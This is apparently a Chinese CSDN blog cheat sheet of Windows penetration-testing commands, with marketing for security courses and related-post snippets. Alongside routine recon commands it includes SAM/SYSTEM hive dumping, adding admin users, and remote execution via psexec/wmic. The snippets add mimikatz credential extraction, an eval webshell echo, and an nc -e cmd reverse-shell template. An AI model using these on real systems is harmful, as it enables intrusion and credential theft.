windows 中渗透测试常用命令

最新推荐文章于 2024-03-02 11:53:01 发布
最新推荐文章于 2024-03-02 11:53:01 发布
阅读量828 收藏 21
点赞数 14
文章标签: windows web安全 运维 podman 网络安全 黑客 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y525698136/article/details/135532364
版权

windows 中渗透测试常用命令

ifconfig /all 获取获取域名、IP地址、DHCP服务器、网关、MAC地址、主机名

net time /domain 查看域名、时间

net view /domain 查看域内所有共享

net view ip 查看对方局域网内开启了哪些共享

net config workstation 查看域名、机器名等

net user 用户名 密码 /add 建立用户

net user 用户名 /del #删除用户

net user guest /active:yes 激活guest账户

net user 查看账户

net user 账户名 查看指定账户信息

net user /domain 查看域内有哪些用户,Windows NT Workstation 计算机上可用,由此可以此判断用户是否是域成员。

net user 用户名 /domain 查看账户信息

net group /domain 查看域中的组

net group “domain admins” /domain 查看当前域的管理用户

query user 查看当前在线的用户

net localgroup 查看所有的本地组

net localgroup administrators 查看administrators组中有哪些用户

net localgroup administrators 用户名 /add 把用户添加到管理员组中

net start 查看开启服务

net start 服务名 开启某服务

net stop 服务名 停止某服务

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

\192.168.0.108\c 访问默认共享c盘

dsquery server 查看所有域控制器

dsquery subnet 查看域内内子网

dsquery group 查看域内工作组

dsquery site 查看域内站点

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写

reg save hklm\sam sam.hive 导出用户组信息、权限配置

reg save hklm\system system.hive 导出SYSKEY

net use \目标IP\ipc$ 密码 /u:用户名 连接目标机器

at \目标IP 21:31 c:\server.exe 在某个时间启动某个应用

wmic /node:“目标IP” /password:“123456” /user:“admin” 连接目标机器

psexec.exe \目标IP -u username -p password -s cmd 在目标机器上执行cmd
finger username @host 查看最近有哪些用户登陆

route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。

arp -a 将显示出全部信息

nslookup IP地址侦测器

tasklist 查看当前进程

taskkill /pid PID数 终止指定PID进程

whoami 查看当前用户及权限

systeminfo 查看计算机信息(版本,位数,补丁情况)

ver 查看计算机操作系统版本

tasklist /svc 查看当前计算机进程情况

netstat -ano 查看当前计算机进程情况

wmic product > ins.txt 查看安装软件以及版本路径等信息,重定向到ins.txt

​最后

为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~

😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓

👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

因篇幅有限,仅展示部分资料

2️⃣视频配套资料&国内外网安书籍、文档

① 文档和书籍资料

② 黑客技术

因篇幅有限,仅展示部分资料

👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈

3️⃣网络安全源码合集+工具包

4️⃣网络安全面试题

5️⃣汇总

所有资料 ⚡️ ,朋友们如果有需要全套 《网络安全入门+进阶学习资源包》,扫码获取~

👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈

程序学到昏
关注
  • 14
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
星外提权工具
07-23
星外虚拟主机提权目录 C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ C:\php\PEAR\ C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\有的杀毒 防火墙目录有权限 C:\7i24.com\iissafe\log\ 不过新版本的貌似放到C:\windows\下了,并且我也没看到有iissafe文件夹了 C:\RECYCLER C:\windows\temp\ 看运气了 c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\ 还有这个,主要看MSSQL版本问题 一切看情况而定了, 有的星外网站目录和系统盘设置都很BT, 但是其他盘如 E,F盘,却可读可写饿e:\recycler\ f:\recycler\ C:\Program Files\Symantec AntiVirus\SAVRT\ C:\WINDOWS\7i24.com\FreeHost C:\php\dev C,D,E… 以下不一定有权限 C:\~1 C:\System Volume Information C:\Program Files\Zend\ZendOptimizer-3.3.0\docs C:\Documents and Settings\All Users\DRM\ C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection C:\Documents and Settings\All Users\Application Data\360safe\softmgr\ C:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps 转载处:t00ls.net 声明,这不是什么星外0DAY,这充其量只是一个在找不到可写可执行目录的一个提权思路。我不敢说是我最先发现的,可能有其他人也发现了,并且也在利用了。无数实例证明了lcx前辈那句话,细节决定成败。这只是入侵渗透的细节问题,刚好我注意到了。下面正文开始。 众所周知要成功提权星外主机就要找到可写可执行目录,可近来星外主机的目录设置越来越BT,几乎没有可写可执行目录。另一个“提权思路”出现了。寻找服务器上安装的第3方软件某些文件的权限问题来进行文件替换,将这些文件替换为我们的cmd.exe和cscript.exe来提权,经我测试发现以下服务器常用软件的某些文件权限为Everyone即为所有用户权限,可以修改,可以上传同文件名替换,删除,最重要的是还可以执行。 首先是我们可爱的360杀毒。 c:\Program Files\360\360Safe\AntiSection\mutex.db 360杀毒数据库文件 c:\Program Files\360\360Safe\deepscan\Section\mutex.db 360杀毒数据库文件 c:\Program Files\360\360sd\Section\mutex.db 360杀毒数据库文件 c:\Program Files\360\360Safe\deepscan\Section\mutex.db这个文件,只要安装了360杀毒就一定存在,并且有Everyone权限。其他2个文件不一定。 c:\Program Files\Helicon\ISAPI_Rewrite3\error.log 态设置软件ISAPI Rewrite日志文件 c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log 态设置软件ISAPI Rewrite日志文件 c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf 静态设置软件ISAPI Rewrite配置文件 主要是ISAPI Rewrite 3.0版本存在权限问题,老版本暂时没发现有此类问题。 c:\Program Files\Common Files\Symantec Shared\Persist.bak 诺顿杀毒事件日志文件 c:\Program Files\Common Files\Symantec Shared\Validate.dat 诺顿杀毒事件日志文件 c:\Program Files\Common Files\Symantec Share
网络渗透技术
10-04
内容提要   《网络渗透技术》是国内第一本全面深入地披露系统与网络底层安全技术的书籍。本书分为十个章节,详细介绍了渗透测试技术的方方面面。   首先介绍了各种调试器和分析工具的简单使用,然后从各种操作系统的体系结构讲起,深入浅出地分析了相应平台的缓冲区溢出利用技术,接着介绍其高级shellcode技术,以及更深入的堆溢出利用技术等。除了用户层的利用技术,在第6章还以Linux操作系统为例详细地介绍了内核溢出的各种利用技术。另外还结合实例,详细介绍了类UNIX系统漏洞分析与发掘技术。   本书不放过每一处技术细节,记录了分析调试过程的每一个步骤,并且给出详细的演示程序。在最后两个章节,本书还对渗透测试撕裂口——Web应用的渗透做了精辟的描述。   本书是XFOCUS团队倾力之作,对于有志于网络安全事业人士而言,本书是一本不可多得的专业参考书。 编辑本段编辑推荐   本书作者均来自专注于网络安全技术的著名站点XPOCUS,Xcon是由XFOCUS TEAM组织的民间信息安全年会,其宗旨是创造自由、交流、共享、创新的学术气氛,促进信息安全技术的发展。   第一届Xcon都是新的超越,我们期待与您相会。 编辑本段目录   第1章 基础知识   1.1 GDB的基本使用方法   1.1.1 断点相关命令   1.1.2 执行相关命令   1.1.3 信息查看相关命令   1.1.4 其他常用命令   1.1.5 Insight图形界面调试器   1.2 SoftICE的基本使用方法   1.2.1 断点相关命令   1.2.2 执行相关命令   1.2.3 查看与修改相关命令   1.2.4 其他常用命令   1.2.5 常用默认快捷键   1.3 NTSD(WinDbg/CDB)的基本使用方法   1.3.1 断点相关命令   1.3.2 执行相关命令   1.3.3 查看与修改相关命令   1.3.4 其他常用命令   1.4 IDA Pro的基本使用方法   1.4.1 强大的反汇编功能   1.4.2 方便的代码阅读功能   1.4.3 常用默认快捷键   第2章 缓冲区溢出利用技术   2.1 缓冲区溢出历史   2.2 Linux x86平台缓冲区溢出利用技术   2.2.1 Linux的内存管理   2.2.2 缓冲区溢出的流程   2.2.3 缓冲区溢出的攻击技术   2.3 Win32平台缓冲区溢出利用技术   2.3.1 Win32平台缓冲区溢出的流程   2.3.2 跳转地址   2.3.3 远程缓冲区溢出演示   2.3.4 结构化异常处理   2.3.5 Windows XP和2003下的增强异常处理   2.3.6 突破Windows 2003堆栈保护   2.4 AIX PowerPC平台缓冲区溢出利用技术   2.4.1 熟悉PowerPC体系及其精简指令集计算   2.4.2 AIX PowerPC堆栈结构   2.4.3 学习如何攻击AIX PowerPC的溢出程序   2.5 Solaris SPARC平台缓冲区溢出利用技术   2.5.1 SPARC体系结构   2.5.2 Solaris SPARC堆栈结构及函数调用过程   2.5.3 学习如何攻击Solaris SPARC的溢出程序   2.6 HP-UX PA平台缓冲区溢出利用技术   2.6.1 PA-RISC体系结构   2.6.2 常用指令集   2.6.3 运行时体系结构(Run~time Architecture)   2.6.4 学习如何攻击HP-UX下的溢出程序   2.7 Windows CE缓冲区溢出利用技术   2.7.1 ARM简介   2.7.2 Windows CE内存管理   2.7.3 Windows CE的进程和线程   2.7.4 Windows CE的API搜索技术   2.7.5 Windows CE缓冲区溢出流程演示   第3章 Shellcode技术   3.1 Linux x86平台Shellcode技术   3.1.1 熟悉系统调用   3.1.2 得到Shell的Shellcode   3.1.3 提取Shellcode的Opcode   3.1.4 渗透防火墙的Shellcode   3.2 Win32平台Shellcode技术   3.2.1 获取kernel32.dll基址   3.2.2 获取Windows API地址   3.2.3 写一个实用的Windows Shellcode   3.2.4 渗透防火墙的Shellcode   3.3 AIX PowerPC平台Shellcode技术   3.3.1 学习AIX PowerPC汇编   3.3.2 学写AIX PowerPC的Shellcode   3.3.3 远程Shellcode   3.3.4 遭遇I-cache   3.3.5 查找socket的Shellcode   3.4 Solaris SPARC平台的Shellcode技术   3.4.1 Solaris系统调用   3.4.2 得到shell的Shellcode   3.4.3 Shellcode的自身定位   3.4.4 解码Shellcode   3.4.5 渗透防火墙的Shellcode   第4章 堆溢出利用技术   第5章 格式化串漏洞利用技术   第6章 内核溢出利用技术   第7章 其他利用技术   第8章 漏洞发掘分析   第9章 CGI渗透测试技术   第10章 SQL注入利用技术   附录A 网络安全英文术语解释
渗透测试Windows常用系统命令总结
最新发布
黄乔国PHP
03-02 225
在实际的渗透测试过程,对操作系统的熟练操作及其重要,但是熟练操作的前提就是需要对系统命令进行熟练掌握,Windows系统命令繁多,渗透测试过程也需要用到很多的系统命令,这里对常用的系统命令进行总结,可用于渗透测试学习过程的快速查阅.
WEB渗透测试数据库
04-01
PentestDB 1 介绍 本项目用于提供渗透测试的辅助工具、资源文件 1.1 辅助工具 提供轻量级的易扩展的工具,可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等;包含以下功能: Exploit系统。易扩展的exploit系统,能够使用API快速编写exploit,能够批量执行exploit 子域名爆破。爆破子域名,使用域传送、DNS爆破、GoogleHacking进行子域名爆破 C段扫描。C段扫描,支持生成html格式输出文件 服务端应用识别。识别CMS类型、Web服务器、操作系统、WEB间件等 URI敏感资源爆破。爆破WEB敏感文件,整站备份、配置备份、敏感文件等 社工密码字典生成。根据社工信息生成密码爆破字典 Google Hacking。GoogleHacking,生成URL字典 编解码等功能。支持非常丰富的编解码方式,方便做payload编码 1.2 资源文件 各种渗透测试常用的资源文件,包括各种爆破字典、exploit、webshell、攻击payload等 2 安装 从这里下载最新版本,或使用命令 git clone https://github.com/alpha1e0/pentestdb.git clone到本地 PentestDB支持Windows/Linux/MacOS,需使用python 2.6.x 或 2.7.x运行 2.1 解决lxml依赖 项目的脚本文件依赖于lxml linux系统一般默认安装lxml,如果没有可通过以下方式安装: pip install lxml apt-get install lxml yum install lxml windows可通过以下方式安装lxml: 到这里找到对应系统的安装包,下载到本地 安装安装包,pip install package.whl 2.2 解决nmap依赖 项目的C段扫描依赖于nmap扫描器 到这里下载nmap相应版本 在windows下需要设置环境变量,让系统能够找到nmap.exe。 3 使用 3.1 常用脚本 项目的python脚本提供用有用的渗透辅助功能,根目录下的pen.py为脚本入口,另外script目录下也有其他一些脚本。 3.1.1 Exploit系统 pen.py的exploit子命令提供了exploit模块相关操作,exploit模块是一个轻量级的exploit框架,可以编写各种web漏洞的exploit: 搜索exploit信息 增加、删除、修改exploit信息 执行某个exploit 搜索并批量执行exploit exploit保存在项目根目录下的exploit目录下 例如: # 列举、搜索、注册、更新、删除 pen.py exploit -l pen.py exploit -q appName:joomla pen.py exploit --register exploit pen.py exploit --update cms_joomla_3_4_session_object_injection.py pen.py exploit -d "Joomla 1.5~3.4 session对象注入漏洞exploit" pen.py exploit --detail "Joomla 1.5~3.4 session对象注入漏洞exploit" # 执行exploit pen.py exploit -e cms_joomla_3_4_session_object_injection.py -u http://127.0.0.1:1234 --attack pen.py exploit -s appName:joomla -u http://127.0.0.1:1234 --verify pen.py exploit -s appName:joomla -u @url.txt 注:有关exploit模块的详细信息请参考exploit/readme.md 3.1.2 服务端应用识别 pen.py的service子命令提供了服务端应用识别的功能,能够识别服务器信息,包括: 操作系统 web服务器 web间件 CMS等 例如: pen.py service http://xxx.com # 开启CMS识别加强模式 pen.py service http://xxx.com --cms 3.1.3 社工密码字典生成 pen.py的password子命令提供了根据社工信息生成密码字典的功能,能够设置不同关键字生成密码字典
mimikatz最新版本地hash抓取神器
06-08
mimikatz大神们都知道的东西吧,渗透测试常用工具。法国一个牛B的人写的轻量级调试器,可以帮助安全测试人员抓取Windows密码。mimikatz 最近发布了它的2.1版本,抓密码命令更加简单了!
渗透测试基础- - -windows网络安全常用dos命令
weixin_67503304的博客
10-26 4407
本文主要从网络安全的角度讲解了windows的dos命令的基本使用方法。
Windows、Linux常见的渗透测试命令
weixin_46239998的博客
04-06 1231
渗透测试命令
Windows内网渗透篇-内网信息收集的类型和命令
黄乔国PHP
01-22 490
渗透测试核心是信息收集,在内网渗透里面我们收集的信息和WEB收集信息有些许不同,但是收集信息的目的都是一样,拓宽攻击面,有利于后续的渗透测试拿下更多的资产.本文记录工作常见的内网里面信息收集的项和相关的命令,希望对大家有帮助.
渗透测试常用WINDOWS命令
AdminTony的博客
11-06 625
渗透测试常用WINDOWS命令 ifconfig /all 获取获取域名、IP地址、DHCP服务器、网关、MAC地址、主机名 net time /domain 查看域名、时间 net view /domain 查看域内所有共享 net view ip 查看对方局域网内开启了哪些共享 net config workstation 查看域名、机器名等 net user 用户名 密码 /add 建立...
信息收集--内网渗透
qq_44555676的博客
08-20 219
内网渗透之信息收集一、Windows(工作组和域)1.检查当前shell权限2.查看系统信息3.tcp/udp网络连接状态信息4.机器名5.查看当前操作系统6.查杀软7.查看当前安装的程序8.查看在线用户9.查看网络配置10.查看进程11.查看当前登陆域12.远程桌面连接历史记录13.查看本机上的用户帐号列表14.查看本机用户XXX的信息15.查看本机用户XXX的信息16.Windows(域)二、Linux1.查看当前权限2.查看网卡配置3.查看端口状态(开启了哪些服务,内网IP连接等)4.查看进程状态(开
烂土豆提权神器(改进版)
04-15
假如操作系统是windows 2008 R2,则在命令提示符,首先切换到该工具所在的目录,然后输入JuicyPotato.exe -p "这里粘贴想要执行的系统命令" 即可获得system权限(该工具在git hubu上)。具体的使用方法请查看本人的...
windows下面常用的***测试命令
weixin_34354173的博客
08-21 290
echo ^<%eval request(“#”)%^> >C:\wmpub\hkfe666\h4ck.asp Md hack 创建hack文件夹 本地nc -vv -p -l 端口服务器nc路径 -e cmd路径 ip 端口 Rd hack 删除hack文件夹 Type d:\wwwroot\hack.asp 查看一句话*...
windows渗透大全
weixin_44110913的博客
06-09 1839
目录 Windows发展历史 Windows常见的目录 Windows常见的cmd命令 Windowscmd窗口的文件下载(bitsadmin、certutil、iwr) Windows加载并执行PowerShell脚本  本地加载并执行PowerShell脚本 远程下载并执行PowerShell脚本 Windows的批处理文件 Windows快捷键操作 Windows运行窗口的命令 Window...
渗透测试(5)-Windows 命令
fanmeng2008的博客
01-09 955
渗透测试人员必知的windows命令
windows渗透常用命令
qq_45780190的博客
12-17 738
net 的常用用法 查看共享连接 net use 增加远程共享 net use host /u:user pass 查看域当前的主机列表 net view /domain 查看当前域的用户 net user /domain 增加一个本地用户 net user user pass /add 将新增的用户加到本地管理员组 net localgroup "Administrators" user /add 查看域的密码策略 net accounts /domain 查看本地组 net loca
渗透测试渗透测试常用的window命令
weixin_43822401的博客
02-02 220
nbtstat -A ip 对方136到139其一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写。netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)psexec.exe \\目标IP -u username -p password -s cmd 在目标机器上执行cmd。wmic /node:"目标IP" /password:"123456" /user:"admin" 连接目标机器。
windows渗透_汇总常见快捷命令
chenfeng857的博客
09-30 762
解决反弹shell乱码 修复乱码chcp 65001 文件融合 将Trace与beacon融合成为 2.exe,由于破坏了pe结构所以无法执行 copy Trace.exe/b +beacon.exe/a 2.exe 日常运维 任务管理器 taskmgr 查看已打补丁 wmic qfe get Caption,Description,HotFixID,InstalledOn 路由表 route print 查找某个文件的路径 dir /s 1.exe 计算机管理 compmgmt.msc 查看当前是
渗透过程常用的cmd命令
跟派大星学编程
03-27 3315
web渗透测试过程,当我们通过某个漏洞利用成功获取到webshell后,下一步便要通过webshell(通常是大马)进行提权或打包数据。由于webshell对远程服务器的操控,是通过命令行而非图形化界面实现的,因此,渗透过程熟悉常用的命令十分有必要,本文总结了一些黑客入侵时常用的命令。今天先对于windows服务器(cmd命令)总结:ipconfig /all              #查...
使用mimikatz进行windows存储的密码查看
09-07
Windows系统,mimikatz是一种常用的密码查看工具。其使用方法如下: 首先,下载并安装mimikatz工具。可以在GitHub上找到最新的版本。 安装完成后,打开命令提示符,并切换到mimikatz的安装路径下。 运行命令"privilege::debug"以获取调试权限。 接下来,运行命令"sekurlsa::logonpasswords",即可开始查看存储在Windows系统的密码信息。 mimikatz会扫描系统内存,并提取出已存储的密码。其包括本地管理员、远程桌面、Windows凭据等多种密码信息。 mimikatz还可以通过其他命令进一步查看和操作密码信息,比如"sekurlsa::pth"可以创建一个新的访问令牌,并利用已有的用户凭据进行访问。 需要注意的是,mimikatz是一个强大且复杂的工具,仅应在合法和授权的环境下使用。它可以用于安全审计、渗透测试等用途,但也容易被恶意分子用于进行攻击。因此,在没有合法授权的情况下,请不要使用该工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值